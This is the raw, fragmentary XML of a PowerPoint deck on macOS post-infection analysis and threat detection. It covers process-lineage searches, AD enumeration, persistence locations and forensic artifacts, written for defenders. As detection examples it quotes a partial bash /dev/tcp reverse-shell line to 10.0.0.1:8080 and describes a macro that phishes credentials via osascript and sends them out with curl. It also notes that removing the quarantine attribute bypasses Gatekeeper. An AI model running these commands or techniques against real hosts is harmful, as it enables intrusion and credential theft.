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99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F7"/>
    <a:srgbClr val="FF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0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areed/pi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dowens/PICT-Swift/tree/master/pict-Swif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dowens/macOS-browserhist-parser/tree/master/parse-browser-histor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dowens/macOS-browserhist-parser/tree/master/parse-browser-history" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/downloads/MacMalware_2019.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac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dowens/PICT-Swift/tree/master/pict-Swift" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/thomasareed/pict" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/red-teaming-with-a-blue-team-mentaility/b0ede7ecfeb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D571-DECF-C74C-A586-B35F00A59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710" y="916597"/>
            <a:ext cx="8637073" cy="2920713"/>
          </a:xfrm>
          <a:effectLst>
            <a:glow rad="127000">
              <a:srgbClr val="FF5A9B"/>
            </a:glow>
            <a:outerShdw blurRad="50800" dist="38100" dir="13500000" algn="br" rotWithShape="0">
              <a:schemeClr val="accent6">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
                <a:alpha val="49000"/>
              </a:scheme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60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>macOS Post Infection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EC77-490B-7640-A9A0-E8CCC2769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037" y="5510011"/>
            <a:ext cx="8637072" cy="977621"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>Cedric Owens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>ACoD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none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7466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Any MS Office product spawning curl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Macro code can use curl to send out creds after prompting the user with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54819" cy="651936"/>
            <a:chOff x="895392" y="4546596"/>
            <a:chExt cx="9554819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/bin/curl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53677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Creds sent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0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F423A-B8DD-DA48-B749-AEBE4C9C89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8934"/>
            <a:ext cx="15477425" cy="26098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3ABA9-C2B0-5B43-8B9B-C8ED5049D4F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499321" y="1486831"/>
            <a:ext cx="8626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MS Office macro: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> to prompt the user for creds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curl to steal the creds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13699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python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Easy method for post exploitation tasks (dump clipboard, prompt for credentials, get system info, etc.)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Most valid uses will call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> directly from /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> or /bin/bash (not from a scripting language)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528181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08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2. active directory enumeration searches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3022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/Active Directory/&lt;AD_DOMAIN&gt;/All Domains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3000" dirty="0"/>
              <a:t> followed by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sz="3000" dirty="0"/>
              <a:t> or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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> command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query can be used to list domain groups, users, computers, etc.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Example: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408F4-3877-2A47-91EE-6C41F7C4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93" y="5694865"/>
            <a:ext cx="10087027" cy="5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cat /Users/&lt;username&gt;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Similar to net user &lt;username&gt; /domain on Windows – pulls basic AD info for the user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read /Groups/admin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list local accounts with admin rights on the macOS host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52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dsconfigad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-show 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Shows domain info including what AD groups have admin rights on the macOS host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43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8" y="212034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Use of the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klist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command (ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>klist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> –c &lt;cache&gt;)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May be used in attempt to list cached Kerberos tickets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57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 account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703693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ls /Users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dscacheutil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-q group -a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80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enumerate local macOS user accounts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Likely not used much outside of admin systems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F308D-A772-0448-9DBD-1C87CCDD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26" y="4999990"/>
            <a:ext cx="7297275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24" y="2795792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3. Command line searches/detections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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF38F7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(not the best but can still be of use)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29616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099-B22D-9B4C-ADDA-D97E9C3E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2635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A194-90E4-9840-918E-A7DB3D83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85913"/>
            <a:ext cx="6572249" cy="4672011"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="925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Red Team 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Austin-based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Blue Team Experience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      macOS post exploitation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Enjoy 80s/90s Nostalgia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        @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>cedowens</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0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1EA5DBCB-32BE-B64F-8390-12F9A516B960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286177" y="3813426"/>
            <a:ext cx="501609" cy="532446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744A-24BD-6140-8502-B980FDA2F2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419" y="4971655"/>
            <a:ext cx="1023124" cy="102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2F185-0C43-8F42-A777-428B13284B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106" y="1979458"/>
            <a:ext cx="5017277" cy="336118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AA225-39AB-DD48-8130-4E741CBC97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732" y="1491870"/>
            <a:ext cx="768185" cy="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26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 JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>along with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eval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JXA (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> for automation) using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> binary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Malicious apps invoking JXA get around Apple notarization checks since post exploitation code is server side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975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510854"/>
            <a:ext cx="6278618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password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>or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Password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prompting the user to enter credentials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CC7F-A317-AA4D-A821-776BC491F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42" y="5330744"/>
            <a:ext cx="8965958" cy="1359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C53D1-0A63-254F-A56C-CE7D5859F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562" y="2267712"/>
            <a:ext cx="5208487" cy="2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clipboard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dumping clipboard contents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8CB8-3056-CB49-9B05-FB42FA9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43" y="5054599"/>
            <a:ext cx="9972425" cy="8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30" y="1803462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Basic reverse shell commands at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>pentestmonkey.net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Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>searching for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bash -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/>
              <a:t> with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/dev/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Looking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for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bash -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&gt;&amp; /dev/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/10.0.0.1/8080 0&gt;&amp;1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several methods using bash, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, python, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> for spawning a reverse shell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49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screencapture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-x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Quiet screenshots should be pretty rare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a malicious process attempting to quietly get a screenshot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6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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> 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com.apple.quarantine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&lt;file&gt;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 &lt;file&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/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The quarantine flag is appended to downloaded files and is inspected by Gatekeeper. Removing this flag will allow this file to run without Gatekeeper intervention.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6715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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> 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 &lt;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plist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(or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start)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Launch agents and launch daemons are still the most commonly used persistence in Objective See’s “The Mac Malware of 2019” Report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635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4. OTHER USEFUL searches/detections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4418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657158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python process making lots of outbound network connections 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.app package making prolonged network connections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macOS host connecting to the same destination host intermittently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 for periodic beaconing or command and control activity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687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Searching for unique user agent strings (the less common)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Might seem antiquated, but some malware does still use unique user agent strings (ex: an app running JXA)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96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30" y="1510854"/>
            <a:ext cx="6263671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macOS “State of the Union”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 Look At macOS Detections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Useful macOS Artifacts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Automating macOS artifact collection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Helpful resources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F1CF-FFFD-FB4A-B3AE-4A4911B421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239" y="1591763"/>
            <a:ext cx="4173536" cy="4610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1716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5" y="3277971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Useful artifacts for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post infection analysis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Useful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Thomas Reed (@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>thomasareed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>) is the brains behind several modern post infection analysis techniques on macOS.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Open source automated tools for artifact collection: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PICT: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/thomasareed/pict</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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PICT-Swift: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/cedowens/PICT-Swift/tree/master/pict-Swift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82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05" y="1382838"/>
            <a:ext cx="6565393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QuarantineEventsV2 database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~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2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Safari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~/Library/Safari/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History.db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Chrome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Support/Google/Chrome/Default/History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Firefox History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Support/Firefox/Profiles&lt;random&gt;.default-release/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places.sqlite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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7EA5-EEC0-7B49-B745-AA149FA20C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4007" y="1865692"/>
            <a:ext cx="5637993" cy="42168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547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2157984"/>
            <a:ext cx="12045656" cy="446227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400" dirty="0"/>
              <a:t>Mach-o Binary to do this: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/cedowens/macOS-browserhist-parser/tree/master/parse-browser-history</a:t>
            </a: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18867-E5A4-DD4E-A569-7DF50D3CC8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33544"/>
            <a:ext cx="16198261" cy="15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Common Places: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/System/Library/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LaunchDaemons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~/Library/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/at/jobs/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launchd.conf</a:t>
            </a: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Searches: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‘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tell application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System Events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get the path of every login item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list: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>list launch agents/daemons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kextstat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1800" dirty="0"/>
              <a:t> list kernel extensions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crontab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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> jobs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defaults read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com.apple.loginwindow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LoginHook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: check for login hooks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2CD5-3CFC-BA4D-BC5F-1C2EA7E78A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980" y="1437471"/>
            <a:ext cx="5036036" cy="33196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4812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Chrome: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Support/Google/Chrome/Default/Extensions/&lt;random&gt;/&lt;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version_number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manifest.json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Pull the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“name”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“description”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, and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“permissions”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> data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Firefox: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~/Library/Application Support/Firefox/Profiles/&lt;random&gt;.default-release/extensions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and extract any .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xpi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> files (Firefox extensions)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Safari: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~/Library/Safari/Extensions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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>safariextz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> extensions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FB133-F202-0346-B992-5EE7696D34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56143"/>
            <a:ext cx="12192000" cy="7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5639754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List of All Installs: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/private/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/receipts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>– list of packages and apps that have been installed and when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/Library/Receipts/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InstallHistory.plist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– list of installations and install dates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System Logs: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/log/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/audit/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 collect &lt;time period&gt; --output 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out_path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Network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scutil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sz="1800" dirty="0"/>
              <a:t>: check DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> info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pfctl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 rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: check firewall rules for interesting entries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Process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ps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axo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user,pid,ppid,start,time,command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lsof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800" dirty="0"/>
              <a:t>get process network info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D2110-032A-4744-9D29-031BD9FA67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75" y="2611620"/>
            <a:ext cx="4015993" cy="353374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54346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places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7201752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tmp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/folders/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/Users/Shared/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/Library/Containers/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/hosts/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>- check to see if sites like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>virustotal.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t> are blocked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sudoers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dirty="0"/>
              <a:t> - check entries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~/.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bash_history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/>
              <a:t>– interesting commands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082A-2100-A34A-9D29-F5AC667E95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144" y="2105818"/>
            <a:ext cx="5297483" cy="327939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78389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Malware making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6772713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Malware leveraging command line = easy detection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What about malware using API calls?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Harder but not impossible!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 err="1"/>
              <a:t>Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>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dtruss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> ./&lt;binary&gt;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Strings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Strings &lt;binary&gt; &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>strings.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="19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Build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>yara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> rules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Behavioral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Unique network activity? Files dropped?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165A5-A582-934A-9004-11C3C3D4F3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569" y="1510854"/>
            <a:ext cx="5123183" cy="48391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8189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0099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382618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Common in Bay Area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EDR improvements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More malware targeting macOS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Need for macOS incident response/analysis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08466-C069-D34D-B709-5BE45CBD5E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4" y="4203205"/>
            <a:ext cx="9200165" cy="2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584" y="1510854"/>
            <a:ext cx="6719596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macOS malware is becoming more prevalent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Defenders have several data sources to leverage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Simple detections (command line, least common user agents, etc.) can still be useful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Ensure Remote Apple Events, file sharing, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> are turned off if not needed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If an admin account is needed for remote management, randomize the password and add 2FA to the management server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A74E-2EB7-C04E-91CA-E7F2006507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012" y="2137664"/>
            <a:ext cx="5525248" cy="30744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748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872" y="1510854"/>
            <a:ext cx="10420440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“Mac Malware of 2019” Objective See Report: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://objective-see.com/downloads/MacMalware_2019.pdf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Blog Post On This Content: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://medium.com/red-teaming-with-a-blue-team-mentaility/b0ede7ecfeb9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Thomas Reed’s PICT (in python): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/thomasareed/pict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PICT (in Swift): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://github.com/cedowens/PICT-Swift/tree/master/pict-Swift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Active Directory Discovery with a Mac: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/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Tool to parse browser history:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://github.com/cedowens/macOS-browserhist-parser/tree/master/parse-browser-history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2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26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61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Still lots of discomfort with macOS incident response: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malware are used?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persistence?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False vs. True positive?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Where are the system artifacts?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macOS malware analysis?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61A8B-2FB3-6C4F-BB6A-4FD6F83702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8733" y="3550837"/>
            <a:ext cx="4899429" cy="31654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80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1. parent-child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127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A single python parent process spawning several /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> or /bin/bash children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Several macOS post exploitation toolkits leveraging python (python Empyre, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>MacShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>EvilOSX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, etc.)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888719-57DC-2248-A3A2-C64E5A5D0508}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132788" y="5131538"/>
            <a:ext cx="9536531" cy="651936"/>
            <a:chOff x="895392" y="4546596"/>
            <a:chExt cx="9536531" cy="6519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95E391-193F-F745-98A2-EAAE5EA50D52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DB7A5-A3F4-EF43-AE42-F72F5CAE2CF8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B7EAFB-F332-8641-ABBA-D85723FA5454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C38824-0D43-B345-9979-2E7372DDFDE9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436459-21D5-2547-872D-F925E7CC4460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757667-7C57-EE48-BD39-A2C4A34C7790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132788" y="5864801"/>
            <a:ext cx="9536531" cy="651936"/>
            <a:chOff x="895392" y="4546596"/>
            <a:chExt cx="9536531" cy="6519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B0935A-E820-0E49-B012-4074C8FB10BA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457593-0626-594B-8CDE-650E5291EC21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C0D384-9C3C-694D-B51E-6201B0C8563D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sbin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lsof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E0D4C6-2D9E-6747-AE58-8C0FE39BE71E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3EBB2E-3915-1B4E-96B8-BD647E3663A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5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Any MS Office product spawning /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> or /bin/bash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malicious MS Office macros that spawn shell environments, which usually then call a scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>lang</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="26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r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> (or /bin/bash)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 –c &lt;code&gt;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29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Any MS Office product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 err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> is powerful and can be used for various tasks; detect malicious MS Office macros leveraging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935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{085641EC-C233-0544-BCCF-E27F2E21CC7F}tf10001119</Template>
  <TotalTime>6075</TotalTime>
  <Words>1802</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>252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Rockwell</vt:lpstr>
      <vt:lpstr>Gallery</vt:lpstr>
      <vt:lpstr>macOS Post Infection Analysis</vt:lpstr>
      <vt:lpstr>bio</vt:lpstr>
      <vt:lpstr>AGENDA</vt:lpstr>
      <vt:lpstr>State of the union</vt:lpstr>
      <vt:lpstr>State of the union</vt:lpstr>
      <vt:lpstr>Helpful detections/searches:   1. parent-child relationships</vt:lpstr>
      <vt:lpstr>parent-child relationships</vt:lpstr>
      <vt:lpstr>parent-child relationships</vt:lpstr>
      <vt:lpstr>parent-child relationships</vt:lpstr>
      <vt:lpstr>parent-child relationships</vt:lpstr>
      <vt:lpstr>Example </vt:lpstr>
      <vt:lpstr>parent-child relationships</vt:lpstr>
      <vt:lpstr>Helpful detections/searches:   2. active directory enumeration searches</vt:lpstr>
      <vt:lpstr>Active directory enum</vt:lpstr>
      <vt:lpstr>Active directory enum</vt:lpstr>
      <vt:lpstr>Active directory enum</vt:lpstr>
      <vt:lpstr>Active directory enum</vt:lpstr>
      <vt:lpstr>Local account enum</vt:lpstr>
      <vt:lpstr>Helpful detections/searches:   3. Command line searches/detections   (not the best but can still be of use)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Helpful detections/searches:   4. OTHER USEFUL searches/detections</vt:lpstr>
      <vt:lpstr>OTHER USEFUL SEARCHES</vt:lpstr>
      <vt:lpstr>OTHER USEFUL SEARCHES</vt:lpstr>
      <vt:lpstr>Useful artifacts for  post infection analysis   </vt:lpstr>
      <vt:lpstr>Useful artifacts</vt:lpstr>
      <vt:lpstr>Browser history</vt:lpstr>
      <vt:lpstr>Browser history</vt:lpstr>
      <vt:lpstr>persistence</vt:lpstr>
      <vt:lpstr>Browser extensions</vt:lpstr>
      <vt:lpstr>System info</vt:lpstr>
      <vt:lpstr>Other places to check</vt:lpstr>
      <vt:lpstr>Malware making api calls?</vt:lpstr>
      <vt:lpstr>Putting it all together</vt:lpstr>
      <vt:lpstr>summary</vt:lpstr>
      <vt:lpstr>resources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Infection Analysis on macOS Hosts</dc:title>
  <dc:creator>Cedric Owens</dc:creator>
  <cp:lastModifiedBy>Cedric Owens</cp:lastModifiedBy>
  <cp:revision>67</cp:revision>
  <cp:lastPrinted>2020-01-05T04:10:11Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-03T15:04:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-15T18:44:23Z</dcterms:modified>
</cp:coreProperties>
</file>